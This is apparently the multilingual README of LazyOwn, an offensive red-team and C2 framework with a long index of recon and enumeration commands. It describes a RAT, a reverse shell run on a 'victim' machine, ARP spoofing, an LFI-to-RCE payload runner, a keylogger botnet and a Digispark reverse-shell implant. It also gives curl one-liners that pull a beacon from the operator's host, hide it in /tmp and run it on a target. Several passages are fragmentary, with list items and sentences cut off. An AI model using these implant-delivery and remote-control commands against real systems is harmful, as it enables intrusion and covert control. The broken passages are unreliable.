LazyOwn RAT — это простой, но мощный инструмент удаленного администрирования. Он включает функцию создания скриншотов, которая захватывает экран сервера, команду загрузки, которая позволяет нам загружать файлы на скомпрометированную машину, и режим C&C, в котором команды могут отправляться на сервер. Он работает в двух режимах: режим клиента и режим сервера. Здесь нет обфускации, и RAT основан на BasicRat. Вы можете найти его на GitHub по адресу https://github.com/awesome-security/basicRAT и на https://github.com/hash3liZer/SillyRAT. Хотя последний гораздо более полный, я просто хотел реализовать захват скриншотов, загрузку файлов и отправку команд. Возможно, в будущем я добавлю функцию просмотра веб-камеры, но это будет позже.
usage: lazyownserver.py [-h] [--host HOST] [--port PORT] --key KEY
lazyownserver.py: error: the following arguments are required: --key
usage: lazyownclient.py [-h] --host HOST --port PORT --key KEY
lazyownclient.py: error: the following arguments are required: --host, --port, --key
LazyOwn> run lazyownclient
[?] lhost and lport and rat_key must be set
LazyOwn> run lazyownserver
[?] rhost and lport and rat_key must be set
luego los comandos son:
upload /path/to/file
donwload /path/to/file
screenshot
sysinfo
fix_xauth #to fix xauth xD
lazyownreverse 192.168.1.100 8888 #Reverse shell to 192.168.1.100 on port 8888 ready to C&C
LazyMeta Extract0r — это инструмент, предназначенный для извлечения метаданных из различных типов файлов, включая PDF, DOCX, OLE-файлы (такие как DOC и XLS) и несколько форматов изображений (JPG, JPEG, TIFF). Этот инструмент будет проходить по указанному каталогу, искать файлы с совместимыми расширениями, извлекать метаданные и сохранять их в выходной файл.
[*] Запуск: LazyMeta extract0r [;,;]
usage: lazyown_metaextract0r.py [-h] --path PATH lazyown_metaextract0r.py: ошибка: требуются следующие аргументы: --path
python3 lazyown_metaextract0r.py --path /home/user
A encryption method that allows us to both encrypt files and decrypt them if we have the key, of course.
encrypt path/to/file key # to encrypt
decrypt path/to/file.enc key #to decrypt
The use of Lazynmap provides us with an automated script for a target, in this case, 127.0.0.1, using Nmap. The script requires administrative permissions via sudo. It also includes a network discovery module to identify what is present in the IP segment you are in. Additionally, the script can now be called without parameters using the alias nmap or with the command run lazynmap.
./lazynmap.sh -t 127.0.0.1 # or in the cli just nmap
Discover the revolution in automating pentesting tasks with the LazyOwn GPT One Liner CLI Assistant! This incredible script is part of the LazyOwn tool suite, designed to make your life as a pentester more efficient and productive.
Key Features:
Intelligent Automation: Leverages the power of Groq and advanced natural language models to generate precise and efficient commands based on your specific needs. User-Friendly Interface: With a simple prompt, the assistant generates and executes one-liner scripts, drastically reducing the time and effort involved in creating complex commands. Continuous Improvement: Continuously transforms and optimizes its knowledge base to provide you with the best solutions, adapting to each situation. Simplified Debugging: Enable debug mode to obtain detailed information at every step, facilitating the identification and correction of errors. Seamless Integration: Works effortlessly within your workspace, harnessing the power of the Groq API to deliver quick and accurate responses. Security and Control:
Safe Error Handling: Intelligently detects and responds to execution errors, ensuring you maintain full control over each generated command. Controlled Execution: Before executing any command, it requests your confirmation, giving you peace of mind knowing exactly what is being executed on your system. Easy Configuration:
Set up your API key in seconds and start enjoying all the benefits offered by the LazyOwn GPT One Liner CLI Assistant. A quick start guide is available to help you configure and maximize the potential of this powerful tool.
Ideal for Pentesters and Developers:
Optimize Your Processes: Simplify and accelerate command generation in your security audits. Continuous Learning: The knowledge base is constantly updated and improved, always providing you with the latest best practices and solutions. With the LazyOwn GPT One Liner CLI Assistant, transform the way you work, making it faster, more efficient, and secure. Stop wasting time on repetitive and complex tasks, and focus on what truly matters: discovering and resolving vulnerabilities!
Join the pentesting revolution with LazyOwn and take your productivity to the next level!
[?] Usage: python lazygptcli.py --prompt "" [--debug]
[?] Options:
--prompt "The prompt for the programming task (required)." --debug, -d "Enables debug mode to display debug messages." --transform "Transforms the original knowledge base into an enhanced base using Groq." [?] Ensure you configure your API key before running the script: export GROQ_API_KEY= [->] Visit: https://console.groq.com/docs/quickstart (not a sponsored link)
Requirements:
Python 3.x A valid Groq API key Steps to Obtain the Groq API Key: Visit Groq Console (https://console.groq.com/docs/quickstart) to register and obtain an API key.
export GROQ_API_KEY=<tu_api_key>
python3 lazygptcli.py --prompt "<tu prompt>" [--debug]
Provide the arguments as specified by the script's requests: The script will require the following arguments:
usage: lazyown_bprfuzzer.py [-h] --url URL [--method METHOD] [--headers HEADERS] [--params PARAMS] [--data DATA] [--json_data JSON_DATA] [--proxy_port PROXY_PORT] [-w WORDLIST] [-hc HIDE_CODE] --url: The URL to which the request will be sent (required). --method: The HTTP method to use, such as GET or POST (optional, default: GET). --headers: The request headers in JSON format (optional, default: {}).
--params: Параметры URL в формате JSON (необязательно, по умолчанию: {}). --data: Данные формы в формате JSON (необязательно, по умолчанию: {}). --json_data: JSON-данные для запроса в формате JSON (необязательно, по умолчанию: {}). --proxy_port: Порт для внутреннего прокси (необязательно, по умолчанию: 8080). -w, --wordlist: Путь к словарю для режима фаззинга (необязательно). -hc, --hide_code: HTTP-код состояния, который нужно скрыть в выводе (необязательно). Убедитесь, что вы предоставили необходимые аргументы, чтобы скрипт работал корректно.
python3 lazyown_bprfuzzer.py --url "http://example.com" --method POST --headers '{"Content-Type": "LAZYFUZZ"}'
Форма 2: Расширенное использование
Если вы хотите воспользоваться расширенными возможностями скрипта, такими как повтор запроса или фаззинг, выполните следующие шаги:
Повтор запроса:
Чтобы использовать функцию повтора запроса, укажите аргументы, как было описано ранее. Во время выполнения скрипт спросит, хотите ли вы повторить запрос. Введите 'y' для повтора или 'n' для завершения повторителя. Фаззинг:
Чтобы использовать функцию фаззинга, обязательно укажите словарь с помощью аргумента -w или --wordlist. Скрипт заменит слово LAZYFUZZ в URL и других данных на слова из предоставленного словаря. Во время выполнения скрипт будет отображать результаты каждой итерации фаззинга. Это основные и расширенные способы использования скрипта lazyburp.py. В зависимости от ваших потребностей вы можете выбрать метод, который лучше всего подходит для вашей конкретной ситуации.
python3 lazyown_bprfuzzer.py \ ─╯
--url "http://127.0.0.1:80/LAZYFUZZ" \
--method POST \
--headers '{"User-Agent": "LAZYFUZZ"}' \
--params '{"param1": "value1", "param2": "LAZYFUZZ"}' \
--data '{"key1": "LAZYFUZZ", "key2": "value2"}' \
--json_data '{"key3": "LAZYFUZZ"}' \
--proxy_port 8080 \
-w /usr/share/seclist/SecLists-master/Discovery/Variables/awesome-environment-variable-names.txt \
-hc 501
python3 lazyown_bprfuzzer.py \ ─╯
--url "http://127.0.0.1:80/LAZYFUZZ" \
--method POST \
--headers '{"User-Agent": "LAZYFUZZ"}' \
--params '{"param1": "value1", "param2": "LAZYFUZZ"}' \
--data '{"key1": "LAZYFUZZ", "key2": "value2"}' \
--json_data '{"key3": "LAZYFUZZ"}' \
--proxy_port 8080 \
-w /usr/share/seclist/SecLists-master/Discovery/Variables/awesome-environment-variable-names.txt \
Примечание: Чтобы использовать словарь, выполните следующую команду в /usr/share/seclists:
now the command 'getseclist' do that automated.
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
&& unzip SecList.zip \
&& rm -f SecList.zip
Этот модуль используется для поиска паролей на FTP-серверах в сети. Некоторые могут сказать, что FTP больше не используется, но вы бы удивились, сколько критически важных инфраструктурных сред я видел с массовыми FTP-сервисами, работающими на их серверах. :)
assign device eth0
run lazyftpsniff
Прослушивание
nc -nlvp 1337 #o el puerto que escojamos
затем на машине жертвы
./lazyreverse_shell.sh --ip 127.0.0.1 --puerto 1337
Модуль находится в каталоге modules и используется следующим образом:
chmod +x lazycurl.sh
и затем
./lazycurl.sh --mode GET --url http://10.10.10.10
Использование.
GET:
./lazycurl.sh --mode GET --url http://10.10.10.10
POST:
./lazycurl.sh --mode POST --url http://10.10.10.10 --data "param1=value1¶m2=value2"
TRACE:
./lazycurl.sh --mode TRACE --url http://10.10.10.10
```sh
File upload:
```sh
./lazycurl.sh --mode UPLOAD --url http://10.10.10.10 --file file.txt
режим перебора по словарю:
./lazycurl.sh --mode BRUTE_FORCE --url http://10.10.10.10 --wordlist /usr/share/wordlists/rockyou.txt
Убедитесь, что вы настроили параметры в соответствии с вашими потребностями и что значения, которые вы предоставляете для опций, действительны для каждого случая.
Скрипт предоставляет атаку ARP-спуфинга с использованием Scapy. В полезной нагрузке вы должны указать lhost, rhost и устройство, которое будете использовать для выполнения ARP-спуфинга.
assign rhost 192.168.1.100
assign lhost 192.168.1.1
assign device eth0
run lazyarpspoofing
Этот скрипт предоставляет рентгеновское представление системы, на которой выполняется инструмент, предлагая понимание её конфигурации и состояния.
run lazygath
Режим LFI RFI 2 RCE предназначен для тестирования некоторых из наиболее известных полезных нагрузок против параметров, указанных в payload.json. Это позволяет провести всестороннюю оценку уязвимостей локального включения файлов (LFI), удаленного включения файлов (RFI) и удаленного выполнения кода (RCE) в целевой системе.
payload
run lazylfi2rce
https://www.youtube.com/watch?v=_-DDiiMrIlE
Режим сниффера позволяет захватывать сетевой трафик через интерфейсы с помощью опции -i, которая является обязательной. Есть много других дополнительных настроек, которые можно регулировать по мере необходимости.
usage: lazysniff.py [-h] -i INTERFACE [-c COUNT] [-f FILTER] [-p PCAP]
lazysniff.py: error: the following arguments are required: -i/--interface

To use the sniffer from the framework, you must configure the device with the command:
```sh
run lazysniff
or just
sniff
Эта функция находится в экспериментальном режиме и не работает полностью из-за проблемы с путями. Вскоре она будет поддерживать обфускацию с использованием PyInstaller.
./py2el.sh
Эта функция находится в экспериментальном режиме, так как она ещё не работает... (скоро появится, возможно, реализация EternalBlue и другие вещи...)
run lazynetbios
Эта функция находится в экспериментальном режиме, и расшифровка журналов кейлоггера не работает xD. Здесь мы впервые видим в действии команду payload, которая задает всю конфигурацию в нашем payload.json, позволяя нам предварительно загрузить конфигурацию перед запуском фреймворка.
payload
run lazybotnet
Скрипт имеет интерактивные меню для выбора выполняемых действий. В режиме сервера он отображает соответствующие опции для машины-жертвы, а в режиме клиента — опции, относящиеся к атакующей машине.
Скрипт обрабатывает сигнал SIGINT (обычно генерируемый Control + C) для чистого выхода.
Этот проект лицензирован под лицензией GPL v3. Информация, содержащаяся в GTFOBins, принадлежит ее авторам, которым мы чрезвычайно благодарны за предоставленную информацию.
Особая благодарность GTFOBins за ценную информацию, которую они предоставляют, и вам за использование этого проекта. Также спасибо за вашу поддержку Tito S4vitar! который проделывает невероятную работу по распространению информации. Конечно, я использую функцию extractPorts в моем .zshrc :D, спасибо deepwiki за помощь с документацией. ( https://deepwiki.com/grisuno/LazyOwn/ ), спасибо plaintext, который проделывает невероятную работу по распространению информации, и мы приняли PTMultiTools, это очень впечатляюще.
Отличный инструмент, который я немного адаптировал для работы с проектом; все заслуги принадлежат его автору honze-net Андреасу Хонциа. Посетите и поддержите проект: https://github.com/honze-net/pwntomate
Отличный инструмент для обнаружения CVE, я реализовал только поиск по ключевым словам, так как мне пришлось изменить некоторые библиотеки. Скоро также для XML, генерируемого nmap :) Огромное спасибо justakazh. https://github.com/justakazh/sicat/
За выявление и сообщение о сбоях сборки Docker, вызванных сбоем repo.charm.sh и несовместимостью версий Python. Его отчет привел к исправлениям в lazyown-docker/Dockerfile.
За два критических предупреждения безопасности, которые помогли нам укрепить фреймворк и исправить серьезные уязвимости. Их ответственное раскрытие делает LazyOwn безопаснее для всего сообщества.
BlackSandBeacon впервые привносит расширяемость Beacon Object File (BOF) в Linux в рамках фреймворка с открытым исходным кодом C2. Ни один коммерческий C2 (включая Cobalt Strike) не предлагает поддержку Linux BOF.
В Windows BOF — это позиционно-независимые объекты PE COFF, загружаемые beacon во время выполнения, что дает операторам систему плагинов в памяти без запуска новых процессов. BlackSandBeacon переносит эту модель на Linux:
.so) с помощью GCC (-shared -fPIC -nostartfiles).dlopen — без записи на диск после доставки, без нового процесса, без оболочки.datap (BeaconDataParse, BeaconDataInt, BeaconDataExtract, BeaconPrintf, BeaconOutput) совместим с исходным кодом контракта Windows BOF, поэтому существующие авторы BOF могут портировать, заменяя вызовы Win32 на системные вызовы Linux или эквиваленты libc.io_uring для взаимодействия с ядром без связывания с libc.# 1. Build and stage the beacon
(LazyOwn) > blacksandbeacon
# 2. Deliver to target (command runs on target)
curl -sk "http://{lhost}:{lport}/blacksandbeacon" -o /tmp/.svc && chmod +x /tmp/.svc && /tmp/.svc &
# 3. Build and stage the BOF loader
(LazyOwn) > blacksandbeacon_bof
# 4. Deliver the BOF loader to a live session
curl -sk "http://{lhost}:{lport}/bof_loader" -o /tmp/.bof && chmod +x /tmp/.bof && /tmp/.bof
// Replace Win32 API calls with direct syscalls or libc equivalents.
// The datap API remains identical.
#include "beacon.h"
void go(char *args, int len) {
datap parser;
BeaconDataParse(&parser, args, len);
char *target = BeaconDataExtract(&parser, NULL);
// Linux: use syscall(SYS_open, ...) instead of CreateFile
BeaconPrintf(CALLBACK_OUTPUT, "target: %s\n", target);
}
Компиляция: gcc -shared -fPIC -nostartfiles -o mybof.so mybof.c
| Возможность | Cobalt Strike | Sliver | Havoc | LazyOwn + BlackSandBeacon |
|---|---|---|---|---|
| Windows BOF | Да | Нет | Нет | Да (через аддон beacon) |
| Linux BOF | Нет | Нет | Нет | Да |
| ARM BOF | Нет | Нет | Нет | Планируется (blackzincbeacon) |
| Открытый исходный код | Нет | Да | Да | Да |
LazyOwn поставляется как «все-в-одном» фронтенд небольшой экосистемы специализированных инструментов для red-team. Каждый проект ниже самостоятелен и может быть интегрирован в LazyOwn через lazyaddons/*.yaml, конвейер имплантов C2 или представление MCP lazyown_palette --info (которое показывает соседей calls и related, полученных из graphify, для каждой команды).
Готовые замены встроенного Go beacon, когда вам нужен меньший размер или артефакты для конкретной архитектуры:
- beacon — минималистичный Windows-бикон на C с поддержкой BOF через инъекцию APC Early Bird и вызовы NT Native API. Сочетается с изменяемым профилем C2 LazyOwn. Подключается через lazyaddons/beacon.yaml.
- blacksandbeacon — нативный Linux-бикон на C с первоклассной поддержкой Linux BOF (Beacon Object File) через инъекцию общих объектов ELF и прямые системные вызовы. BOF загружаются во время выполнения через среду выполнения dlopen — та же модель расширяемости, что и Windows BOF, но нацеленная на внутренности ядра Linux. Ни один коммерческий C2-фреймворк (включая Cobalt Strike) не предлагает поддержку Linux BOF. Подключается через lazyaddons/blacksandbeacon.yaml; загрузчик BOF через lazyaddons/blacksandbeacon_bof.yaml.
- blackzincbeacon — ARM-сборка того же семейства для встраиваемых / IoT-задач.
Альтернативные C2-поверхности, которые говорят на том же beacon-протоколе, что и lazyc2.py, или могут служить серверной частью teamserver:
lazyc2.py.Встраивается в LazyOwn через MCP, lazyaddon toposwarm или напрямую:
Используется как людьми через файлы .tool pwntomate, так и автономным демоном, когда реактивный селектор рекомендует технику в памяти:
lazyaddons/gomulti_loader_linux.yaml и gomulti_loader_windows.yaml.netsh для Windows.LazyOwn уже поставляет несколько недавних PoC класса ядра через систему аддонов (lazyaddons/copyfail.yaml, lazyaddons/dirtyfrag.yaml, lazyaddons/CVE-2022-22077.yaml, lazyaddons/CVE_2025_24071_PoC.yaml, lazyaddons/ebird3.yaml). Оригинальные репозитории перечислены здесь для проверяемости и цитирования:
copyfail.Хотите добавить свой? Поместите
lazyaddons/<name>.yamlс описаниемrepo_url,install_commandиexecute_command; LazyOwn подхватит его автоматически и отобразит через представление MCPlazyown_palette.
LazyOwn — это фреймворк, который оптимизирует свой рабочий процесс и автоматизирует множество задач и тестов с помощью алиасов и различных инструментов, работая как швейцарский нож с многоцелевыми лезвиями для взлома xD.
Компилирует и загружает скетч .ino на устройство Digispark с помощью Arduino CLI и Micronucleus.
Этот метод проверяет, установлены ли Arduino CLI и Micronucleus в системе.
Если они недоступны, он устанавливает их. Затем он компилирует скетч Digispark
и загружает сгенерированный .hex-файл на устройство Digispark.
Метод выполняет следующие действия:
1. Проверяет наличие Arduino CLI и устанавливает его, если он недоступен.
2. Настраивает Arduino CLI для Digispark, если он ещё не настроен.
3. Генерирует полезную нагрузку reverse shell и подготавливает скетч для Digispark.
4. Компилирует подготовленный скетч Digispark с помощью Arduino CLI.
5. Проверяет наличие Micronucleus и устанавливает его, если он недоступен.
6. Загружает скомпилированный .hex-файл на устройство Digispark с помощью Micronucleus.
Аргументы:
line (str): Ввод командной строки, предоставленный пользователем, который может содержать дополнительные параметры.
Возвращает:
None: Функция не возвращает никакого значения, но может изменять состояние системы
путем выполнения команд.
Документация автоматически создается скриптом readmeneitor.py, созданным для этого проекта; возможно, когда-нибудь у него будет собственный репозиторий, но пока я не вижу в этом необходимости.
https://github.com/grisuno/ReadMenator
Использование LazyOwn RedTeam Framework для атаки на цели без предварительного взаимного согласия незаконно. Ответственность за соблюдение всех применимых местных, государственных и федеральных законов лежит на конечном пользователе. Разработчики не несут ответственности и не отвечают за любое неправильное использование или ущерб, причиненный этой программой. Используйте только в образовательных целях.
Автоматически сгенерировано readmeneitor.py из исходных docstrings и cli/command_index.json.
alterxФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет команду 'alterx' для перечисления поддоменов на указанном self.params['domain']. Если 'alterx'
apache_usersФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет перечисление пользователей целевой системы с помощью apache-users.
binarycheckФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет различные проверки выбранного бинарного файла для сбора информации и защиты.
cveФаза: разведка | Источник: cli/commands/recon_migrated.py
Поиск CVE с использованием API CIRCL.
digФаза: разведка | Источник: cli/commands/recon.py
Выполняет команду dig для запроса DNS-информации.
dnschefФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет команду dnschef для запроса DNS-информации.
Выполняет инструмент DNSChef для мониторинга DNS-запросов и перехвата ответов.
dnsenumФаза: разведка | Источник: cli/commands/recon.py
Выполняет перечисление DNS с помощью dnsenum для определения поддоменов заданного домена.
dnsmapФаза: разведка | Источник: cli/commands/recon.py
Выполняет перечисление DNS с помощью dnsmap для обнаружения поддоменов указанного домена.
dnstool_pyФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет инструмент dnstool.py для изменения DNS-записей, интегрированных с Active Directory.
estorides_importФаза: разведка | Источник: cli/commands/estorides.py
Импортирует объекты, обнаруженные Estorides, в базу данных и область действия LazyOwn.
estorides_loopФаза: разведка | Источник: cli/commands/estorides.py
Запускает двунаправленный цикл обратной связи Estorides <-> LazyOwn.
estorides_seedФаза: разведка | Источник: cli/commands/estorides.py
Передает хосты/домены LazyOwn в Estorides для пассивного OSINT-обнаружения.
estorides_surfaceФаза: разведка | Источник: cli/commands/estorides.py
Показывает комбинированную активную + пассивную поверхность атаки.
finalreconФаза: разведка | Источник: cli/commands/recon.py
Запускает инструмент finalrecon для выполнения сканирования уязвимостей веб-сервера по указанному целевому хосту.
getcapФаза: разведка | Источник: cli/commands/recon_migrated.py
Получает и отображает возможности файлов в системе.
gospiderФаза: разведка | Источник: cli/commands/recon_migrated.py
Попробуйте gospider для веб-сканирования (обхода сайтов).
grauditФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет команду graudit для статического анализа кода с указанными параметрами.
httprobeФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет инструмент httprobe для проверки доменов на наличие работающих HTTP и HTTPS серверов.
ipinfoФаза: разведка | Источник: cli/commands/recon_migrated.py
Получает подробную информацию об IP-адресе с помощью ARIN API.
launchpadФаза: разведка | Источник: cli/commands/recon_migrated.py
Ищет пакеты на Launchpad на основе предоставленного поискового запроса и извлекает кодовые имена из результатов. Дистрибутив извлекается из поискового запроса.
metabigorФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет команды Metabigor для задач OSINT и сканирования с управляемым вводом или предопределенными аргументами.
openssl_sclientФаза: разведка | Источник: cli/commands/recon.py
Использует openssl s_client для подключения к указанному хосту и порту, что позволяет тестировать и отлаживать SSL/TLS-соединения.
pingФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет ping для проверки доступности хоста и определения операционной системы на основе значений TTL.
portsФаза: разведка | Источник: cli/commands/recon_migrated.py
Перечисляет все открытые TCP и UDP порты в локальной системе.
proxyФаза: разведка | Источник: cli/commands/recon_migrated.py
Запускает небольшой прокси-сервер для изменения HTTP-запросов на лету.
reconФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет разведку по указанному self.params['domain'] с помощью crt.sh (цель должна быть видна в интернете), pup, httprobe и EyeWitness.
serveralive2Фаза: разведка | Источник: cli/commands/recon_migrated.py
Команда serveralive2: использует Impacket для подключения к удаленному интерфейсу MSRPC и получает привязки сервера.
sherlockФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет инструмент Sherlock для поиска имен пользователей в социальных сетях.
sslscanФаза: разведка | Источник: cli/commands/recon_migrated.py
Выполняет SSL-сканирование указанного удаленного хоста.
surfaceФаза: разведка | Источник: cli/commands/recon_migrated.py
Отображает граф сетевой поверхности в терминале.
tcpdump_captureФаза: разведка | Источник: cli/commands/recon_migrated.py
Запускает захват пакетов с помощью tcpdump на указанном интерфейсе.
tcpdump_icmpФаза: разведка | Источник: cli/commands/recon_migrated.py
Запускает tcpdump для захвата ICMP-трафика на указанном интерфейсе.
traceФаза: разведка | Источник: cli/commands/recon_migrated.py
Трассирует DNS-информацию для заданного self.params['domain'] с помощью службы FreeDNS. (используется IP FreeDNS, а не ваш IP)
trufflehogPhase: recon | Source: cli/commands/recon_migrated.py
Запускает trufflehog для поиска секретов в указанном URL Git-репозитория.
tshark_analyzePhase: recon | Source: cli/commands/recon_migrated.py
Анализирует файл захвата пакетов с помощью tshark на основе указанного IP-адреса удаленного хоста.
waybackmachinePhase: recon | Source: cli/commands/recon_migrated.py
Получает URL-адреса из Wayback Machine для заданного веб-сайта.
whatwebPhase: recon | Source: cli/commands/recon.py
Выполняет сканирование для определения технологий веб-сайта с помощью whatweb.
windapsearchscrapeusersPhase: recon | Source: cli/commands/recon_migrated.py
Извлекает имена пользователей из JSON-вывода, созданного go-windapsearch, и добавляет их
ad_ldap_enumPhase: enum | Source: cli/commands/scan_migrated.py
Выполняет ad-ldap-enum для перечисления объектов Active Directory (пользователи, группы, компьютеры)
allinPhase: enum | Source: cli/commands/scan_migrated.py
Запускает инструмент AlliN.py с различными режимами сканирования и параметрами.
amassPhase: enum | Source: cli/commands/scan.py
Выполняет Amass для пассивного перечисления заданного домена.
arjunPhase: enum | Source: cli/commands/scan_migrated.py
Выполняет сканирование Arjun по указанному URL для обнаружения параметров.
arpscanPhase: enum | Source: cli/commands/scan.py
Выполняет ARP-сканирование с помощью arp-scan.
batchnmapPhase: enum | Source: cli/commands/recon.py
Запускает внутренний модуль modules/lazynmap.sh для множественных Nmap-сканирований.
bbotPhase: enum | Source: cli/commands/scan.py
Выполняет сканирование BBOT для выполнения различных задач разведки.
blazyPhase: enum | Source: cli/commands/scan_migrated.py
Команда blazy: устанавливает и запускает blazy для сканирования веб-приложений на множественные уязвимости.
bloodhoundPhase: enum | Source: cli/commands/scan_migrated.py
Выполняет перечисление LDAP с помощью bloodhound-python, используя учетные данные из файла.
breacherPhase: enum | Source: cli/commands/scan_migrated.py
Команда breacher: устанавливает и запускает Breacher для поиска страниц входа администратора и уязвимостей EAR.
certipyPhase: enum | Source: cli/commands/scan_migrated.py
Выполняет инструмент Certipy для взаимодействия со службами сертификации Active Directory.
certipy_adPhase: enum | Source: cli/commands/scan_migrated.py
Запускает certipy-ad против служб сертификации Active Directory.
changemePhase: enum | Source: cli/commands/scan_migrated.py
Выполняет сканирование changeme по указанному целевому URL или хосту.
cmePhase: enum | Source: cli/commands/scan_migrated.py
Выполняет CrackMapExec (CME) для перечисления SMB и попыток аутентификации против цели.
davtestPhase: enum | Source: cli/commands/scan_migrated.py
Проверяет конфигурации сервера WebDAV с помощью davtest.
dirsearchPhase: enum | Source: cli/commands/scan.py
Запускает инструмент dirsearch для перечисления каталогов и файлов по указанному URL.
dmitryPhase: enum | Source: cli/commands/scan.py
Эта функция формирует и выполняет команду для инструмента 'dmitry'.
enum4linuxPhase: enum | Source: cli/commands/enum.py
Выполняет перечисление информации с целевой системы Linux/Unix с помощью enum4linux.
enum4linux_ngPhase: enum | Source: cli/commands/scan_migrated.py
Выполняет перечисление информации с целевой системы с помощью enum4linux-ng.
evil_ssdpPhase: enum | Source: cli/commands/scan_migrated.py
Запускает evil-ssdp с различными параметрами и выбранными пользователем шаблонами.
feroxbusterPhase: enum | Source: cli/commands/scan.py
Команда feroxbuster: устанавливает и запускает Feroxbuster для выполнения принудительного просмотра и перебора каталогов.
finger_user_enumPhase: enum | Source: cli/commands/scan_migrated.py
Выполняет инструмент finger-user-enum для перечисления пользователей на целевом хосте.
fuzzPhase: enum | Source: cli/commands/scan_migrated.py
Выполняет скрипт фаззинга веб-сервера с параметрами, предоставленными пользователем.
getnpusersPhase: enum | Source: cli/commands/enum.py
sudo impacket-GetNPUsers mist.htb/ -no-pass -usersfile sessions/users.txt
gobusterФаза: enum | Источник: cli/commands/scan.py
Использует gobuster для фаззинга каталогов и виртуальных хостов на основе предоставленных параметров. Поддерживает перечисление каталогов и обнаружение виртуальных хостов.
hostdiscoverФаза: enum | Источник: cli/commands/scan.py
Обнаруживает активные хосты в подсети, выполняя ping-свип.
houndФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет инструмент hound. Hound — это простой и легкий инструмент для сбора информации и захвата точных GPS-координат.
kerbruteФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет инструмент Kerbrute для перечисления учетных записей пользователей на указанном контроллере домена self.params['domain'].
lazynmapФаза: enum | Источник: cli/commands/recon.py
Запускает внутренний модуль modules/lazynmap.sh в целевом режиме.
ldapdomaindumpФаза: enum | Источник: cli/commands/scan_migrated.py
Выгружает информацию LDAP с помощью ldapdomaindump, используя учетные данные из файла.
ldapsearchФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет поиск LDAP по целевому удаленному хосту (self.params['rhost']) и сохраняет результаты.
lookupsidФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет инструмент Impacket lookupsid для перечисления SID на целевой системе.
lookupsid_pyФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет инструмент LookupSID для перечисления SID на целевой системе.
loxsФаза: enum | Источник: cli/commands/scan_migrated.py
Команда loxs: устанавливает и запускает Loxs для сканирования веб-приложений на множественные уязвимости.
lynisФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет аудит Lynis на указанной удаленной системе.
magicreconФаза: enum | Источник: cli/commands/scan.py
Команда magicrecon: автоматизирует настройку и использование MagicRecon для выполнения различных типов разведки и сканирования уязвимостей на указанных целях.
mqtt_check_pyФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет инструмент проверки MQTT для проверки учетных данных на целевой системе с возможностью использования SSL.
nbtscanФаза: enum | Источник: cli/commands/recon.py
Выполняет сетевое сканирование с помощью nbtscan для обнаружения имен и адресов NetBIOS в указанном диапазоне.
net_rpc_addmemФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет команду net rpc group addmem для добавления пользователя в указанную группу в Active Directory.
netexecФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет netexec с различными параметрами для операций с сетевыми протоколами.
netviewФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет инструмент Impacket netview для вывода списка сетевых ресурсов на указанной цели.
niktoФаза: enum | Источник: cli/commands/recon.py
Запускает инструмент nikto для сканирования веб-сервера на уязвимости на указанном целевом хосте.
nmapscriptФаза: enum | Источник: cli/commands/scan.py
Выполняет сканирование Nmap с использованием указанного скрипта и порта.
nucleiФаза: enum | Источник: cli/commands/scan.py
Выполняет сканирование Nuclei на указанном целевом URL или хосте.
odatФаза: enum | Источник: cli/commands/scan_migrated.py
Команда odat: запускает модуль ODAT sidguesser для подбора SID Oracle на целевой базе данных Oracle.
openredirexФаза: enum | Источник: cli/commands/scan_migrated.py
Команда openredirex: клонирует, устанавливает и запускает OpenRedirex для тестирования уязвимостей открытого перенаправления.
osmedeusФаза: enum | Источник: cli/commands/scan.py
Выполняет сканирование Osmedeus с управляемым вводом для различных сценариев сканирования.
parseroФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет сканирование parsero на указанном целевом URL или хосте.
parthФаза: enum | Источник: cli/commands/scan_migrated.py
Команда parth: устанавливает и запускает Parth для обнаружения уязвимых URL и параметров.
portdiscoverФаза: enum | Источник: cli/commands/scan.py
Сканирует все порты на указанном хосте для выявления открытых портов.
portservicediscoverФаза: enum | Источник: cli/commands/scan.py
Сканирует все порты на указанном хосте для выявления открытых портов и связанных с ними служб.
pre2kФаза: enum | Источник: cli/commands/scan_migrated.py
Выполняет инструмент pre2k для запроса self.params['domain'] на предмет учётных записей компьютеров до Windows 2000 или для передачи списка имён хостов для проверки аутентификации.
pykerbruteФаза: перечисление | Источник: cli/commands/scan_migrated.py
Команда pykerbrute: автоматизирует установку и выполнение PyKerbrute для перебора учётных записей Active Directory с использованием предварительной аутентификации Kerberos.
rdp_check_pyФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет инструмент проверки RDP для проверки учётных данных или аутентификации на основе хэша на целевой системе.
rpcclientФаза: перечисление | Источник: cli/commands/enum.py
Выполняет команду rpcclient для взаимодействия с удалённой системой Windows через RPC (удалённый вызов процедур) с использованием анонимных учётных данных.
rpcdumpФаза: перечисление | Источник: cli/commands/enum.py
Выполняет скрипт rpcdump.py для сбора информации о RPC-сервисах с целевого хоста.
rpcmap_pyФаза: перечисление | Источник: cli/commands/scan_migrated.py
Команда rpcmap_py: выполняет команды rpcmap.py для перечисления интерфейсов MSRPC.
samrdumpФаза: перечисление | Источник: cli/commands/scan_migrated.py
Запускает impacket-samrdump для сбора данных SAM с указанных портов.
sawksФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет инструмент Swaks (швейцарский армейский нож для SMTP) для отправки тестовых писем с целью имитации фишинга.
sessionsshФаза: перечисление | Источник: cli/commands/scan_migrated.py
Выполняет команду для вывода списка активных SSH-подключений.
skipfishФаза: перечисление | Источник: cli/commands/scan.py
